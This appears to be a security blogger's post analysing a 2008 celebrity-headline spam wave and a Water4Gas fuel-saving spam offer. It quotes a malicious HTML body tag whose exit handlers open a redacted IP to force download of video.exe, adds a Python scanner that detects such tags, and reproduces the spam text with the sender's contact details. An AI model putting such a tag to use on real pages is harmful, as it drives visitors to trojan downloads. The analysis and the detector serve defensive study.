New malware outbreak tries to infect your computer with Trojan.Downloader

The latest malware outbreak tries to attract us with emails carrying subject lines such as: Paris Hilton found to be gay!, China Earthquake claims 1 million lives, Star Trek star dies at age 79, Man wakes up from 40 year coma, Batman latest movie bombs at box office or Italy knocked out of Euro 2008. So far, over 500 emails have been intercepted within 40 minutes.

The email content is only two lines long. It can be anything from “Don’t belittle the effects of power enlargement” to “Don’t make the postman make too many attempted deliveries to get you the herbal solution that will change your life” or “Heir to Prada empire found strangled”. The malicious link has the format http://****.de/r.html and redirects you to PornTube, a rip-off of the YouTube design.

And no, we are not giving you a full screenshot of this web site. ;-)

Once you get there, the page makes a connection behind the scenes to a server at the IP address xx.xxx.xx.xx/index.php, using some scripting in the HTML body tag: <body onbeforeunload="window.open('http://xx.xxx.xx.xx/index.php');" onunload="window.open('http://xx.xxx.xx.xx/index.php');" onclose="window.open('http://xx.xxx.xx.xx/index.php');" id="mainbody">

Over this connection, the site will try to download the file video.exe directly to your computer. Some pop-up windows will appear stating that you need to download an ActiveX Object to run the videos, and it doesn’t matter whether you click Cancel or No: you are stuck in a loop until you download video.exe. Closing your windows or browser is the only option, and even then a new browser window opens at this server again.
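The body tag quoted above has a recognisable shape that a mail or web gateway can check for: exit-related event handlers that call window.open on a URL whose host is a bare IP address. The following is an added example, not code from the original post; the names scan and ExitPopupScanner are hypothetical, and the sample HTML is constructed with the documentation address 192.0.2.10 in place of the redacted server IP.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Exit-related handlers seen on the page's <body> tag.
EXIT_HANDLERS = {"onbeforeunload", "onunload", "onclose"}
# Pull the first argument out of window.open('...') or window.open("...").
OPEN_CALL = re.compile(r"window\.open\(\s*['\"]([^'\"]+)['\"]", re.I)


def is_ip_literal(host):
    """True when the URL host is a bare IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class ExitPopupScanner(HTMLParser):
    """Collects (handler, url, host_is_ip) for exit handlers that open windows."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names, so mixed case is covered.
        for name, value in attrs:
            if name in EXIT_HANDLERS and value:
                for url in OPEN_CALL.findall(value):
                    host = urlparse(url).hostname or ""
                    self.findings.append((name, url, is_ip_literal(host)))


def scan(html):
    scanner = ExitPopupScanner()
    scanner.feed(html)
    return scanner.findings


# Constructed sample: same shape as the tag above, with a documentation
# address (192.0.2.10, RFC 5737) in place of the redacted server IP.
SAMPLE = (
    '<html><body onbeforeunload="window.open(\'http://192.0.2.10/index.php\');" '
    'onunload="window.open(\'http://192.0.2.10/index.php\');" id="mainbody">'
    '<p>video</p></body></html>'
)
BENIGN = '<body onload="init()" id="mainbody"><a href="http://example.com/">x</a></body>'

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with the third field set to True (window opened on exit, pointing at a raw IP) is the combination worth alerting on; exit handlers on their own also appear on legitimate pages.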

As far as I have investigated this for now, it appears that the URLs http://****.de/r.html used in this malware outbreak, which are changing quite rapidly, could in fact be hacked servers hosting valid web sites where the r.html file is placed in the web hosting root of the site. Some images are missing and that’s why the design of PornTube isn’t exactly like the design of YouTube. According to WHOIS, the IP address is registered in Amsterdam, The Netherlands. The video.exe is a variant of Trojan.Downloader.Win32Agent.tyw.

High oil prices inspire spammers

Even spammers have noticed the high oil prices and are offering really good deals.

Hi Emarketer,
 
With over 20,000 satisfied customers worldwide and 900 registered manufacturers, Water4Gas is quickly becoming the web’s standard for DIY technology to save fuel using WATER!
 
Water4Gas is running a limited-time F’ree Gift at

http://www.*****.com/cgi-bin/arp3/arp3-t.pl?l=101&c=2799118

 
They are offering a 7-day e-mail course so you can learn this in your spare time, daily. This course is normally priced at $49.95 but FOR A LIMITED TIME ONLY are giving it away FREE to a limited number of students. (Deadline unknown, may disappear any moment.)

You do NOT have to buy anything or answer any questions!!! I just want you to have this information. Each lesson is easy and short. In about 10 minutes a day you will discover the simplicity and power of using water to clean emissions and save tons of fuel in your car or truck.

Also in this course: ways to MAKE MONEY from this!

If you’ve been searching for a unique way to SAVE $$$ ON FUEL, grab this f’ree deal – perfect for this time of rising gas costs:

http://www.*****.com/cgi-bin/arp3/arp3-t.pl?l=101&c=2799118

 
 
Happy Mileage!

Gerald Aumaugher
gerald@aumaugher.us
251 CR 2603
Pittsburg, TX
903-231-4040

As you may know already, I never follow the complete URLs they provide me in the spam. I love to take a look around on their server. The domain www.*****.com just contains the text “Placeholder for *****.com”.

Following the complete link we get to http://******.info/water4fuel.

When looking further on http://******.info/index.php I get a web site with the title Spider Web Marketing. The site contains some articles regarding this Water4Gas promo and it seems there are more promotions and email campaign texts from the past as well. Okay, back to the main objective.

A very lovely Rachel welcomes you as a visitor on runyourcaronwater.com. The URLs mentioned don’t match very well. But that’s a minor issue.

Looks very promising: no more high-priced fuel needed, just water to keep on driving. “Create your own water hybrid for under $150!”. Let’s read further. I only need approximately less than $60 in raw materials, and the price of all this is at the bottom of the page. Let’s keep scrolling further down and there we have it. The regular value is $297 but we can get it at $49,97. What a saving!

Too good to be true if you ask me.
